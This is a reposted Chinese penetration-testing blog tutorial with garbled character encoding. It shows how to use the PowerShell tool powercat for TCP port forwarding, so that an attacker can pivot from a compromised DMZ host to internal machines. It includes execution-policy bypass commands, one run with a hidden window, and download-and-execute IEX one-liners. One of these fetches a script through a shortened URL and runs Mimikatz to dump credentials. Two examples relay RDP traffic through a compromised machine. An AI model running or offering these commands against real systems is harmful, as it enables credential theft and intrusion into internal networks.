powerCat进行常规tcp端口转发
實(shí)戰(zhàn)中,我們也會(huì)遇到需要我們進(jìn)行端口轉(zhuǎn)發(fā)的情況,比如已經(jīng)拿下的目標(biāo)機(jī)1是在dmz區(qū),而目標(biāo)1所在內(nèi)網(wǎng)的其他目標(biāo)只能通過(guò)目標(biāo)1去訪問(wèn),這時(shí)候我們就需要端口轉(zhuǎn)發(fā)或者代理來(lái)進(jìn)行后滲透。這次就要介紹一個(gè)加強(qiáng)版的nc,基于powershell的后滲透工具
Powercat
?
?
下載地址:Lhttps://github.com/besimorhino/powercat
?
0x01 powercat準(zhǔn)備
首先得改一下ps的執(zhí)行腳本權(quán)限
Set-ExecutionPolicy Bypass
?
?
然后直接執(zhí)行我們的powercat腳本即可。
?
?
也可以通過(guò)常規(guī)三種繞過(guò)執(zhí)行策略的方式執(zhí)行ps腳本
?
本地權(quán)限繞過(guò)
PowerShell.exe?-ExecutionPolicy?Bypass?-File?xxx.ps1
本地隱藏權(quán)限繞過(guò)執(zhí)行腳本
PowerShell.exe?-ExecutionPolicy?Bypass?-NoLogo?-Nonlnteractive?-NoProfile?-WindowStyle?Hidden(隱藏窗口)?-File?xxx.ps1
用IEX下載遠(yuǎn)程PS1腳本回來(lái)權(quán)限繞過(guò)執(zhí)行
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI');Invoke-Mimikatz-DumpCreds"
所以,直接選擇最簡(jiǎn)單的吧,也別下載了,直接遠(yuǎn)程權(quán)限繞過(guò),在Powershell?中執(zhí)行:
IEX?(New-Object?System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
?
?
?
可以看到Powercat已經(jīng)成功執(zhí)行了
?
?
?
0x02 使用powercat端口轉(zhuǎn)發(fā)
?
先來(lái)看下參數(shù)
?
?
?
?
?
?
?
不過(guò)端口轉(zhuǎn)發(fā)中我們只需要其中幾個(gè)參數(shù)
命令解析:
-c?指定一個(gè)ip地址
-p?指定一個(gè)端口
-v?顯示詳情
-l?監(jiān)聽(tīng)模式,用于入站鏈接
-p?本地端口號(hào)
-e?程序重定向,跟nc一毛一樣
-v?顯示詳情
下面用實(shí)際例子來(lái)說(shuō)明每個(gè)參數(shù)的作用
?
?
?
?
?
?
?
?
?
?
?
?
?
?
例子一:
?
環(huán)境: 192.168.190.135 ?windows2003開(kāi)放了3389(目標(biāo)機(jī))
????192.168.190.149 ?windows8 (攻擊機(jī))
?
將192.168.190.135上的3389服務(wù)流量轉(zhuǎn)發(fā)到本地的9001端口,攻擊機(jī)用到的命令為:
?
powercat -c 192.168.190.135 -p 3389 -v -r tcp:9001
?
然后連接本地的9001端口,可以發(fā)現(xiàn)是轉(zhuǎn)發(fā)成功的。
?
?
例子二:
?
環(huán)境: 192.168.190.135 ?windows2003開(kāi)放了3389(內(nèi)網(wǎng)目標(biāo)機(jī))
????192.168.190.151 ?windows8 (外網(wǎng)目標(biāo)機(jī))(與內(nèi)網(wǎng)目標(biāo)機(jī)處一個(gè)內(nèi)網(wǎng))
192.168.190.149 ?windows8 (攻擊機(jī))
Ps:假設(shè)攻擊機(jī)拿下了外網(wǎng)目標(biāo)機(jī)的權(quán)限,想進(jìn)一步內(nèi)網(wǎng)滲透但是不能直接訪問(wèn)內(nèi)網(wǎng)目標(biāo)機(jī)的3389服務(wù),只能通過(guò)外網(wǎng)目標(biāo)機(jī)訪問(wèn)內(nèi)網(wǎng)目標(biāo)機(jī)的3389服務(wù)。
?
?
?
?
外網(wǎng)目標(biāo)機(jī)執(zhí)行:
powercat -c 192.168.190.135 -p 3389 -v -r tcp:6666
(連接內(nèi)網(wǎng)目標(biāo)機(jī)的3389端口,將流程轉(zhuǎn)到自己的6666端口)
?
?
?
攻擊機(jī)執(zhí)行:
powercat -c 192.168.190.151 -p 6666 -v -r tcp:1111
(連接外網(wǎng)目標(biāo)機(jī)的6666端口,把流程轉(zhuǎn)到本地的1111端口)
?
可以看到轉(zhuǎn)發(fā)成功。
?
轉(zhuǎn)載于:https://www.cnblogs.com/-qing-/p/10652351.html
創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎(jiǎng)勵(lì)來(lái)咯,堅(jiān)持創(chuàng)作打卡瓜分現(xiàn)金大獎(jiǎng)總結(jié)
以上是生活随笔為你收集整理的powerCat进行常规tcp端口转发的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 为什么我登lol出现本页要求建立包含服务
- 下一篇: 云上绣娘剧情介绍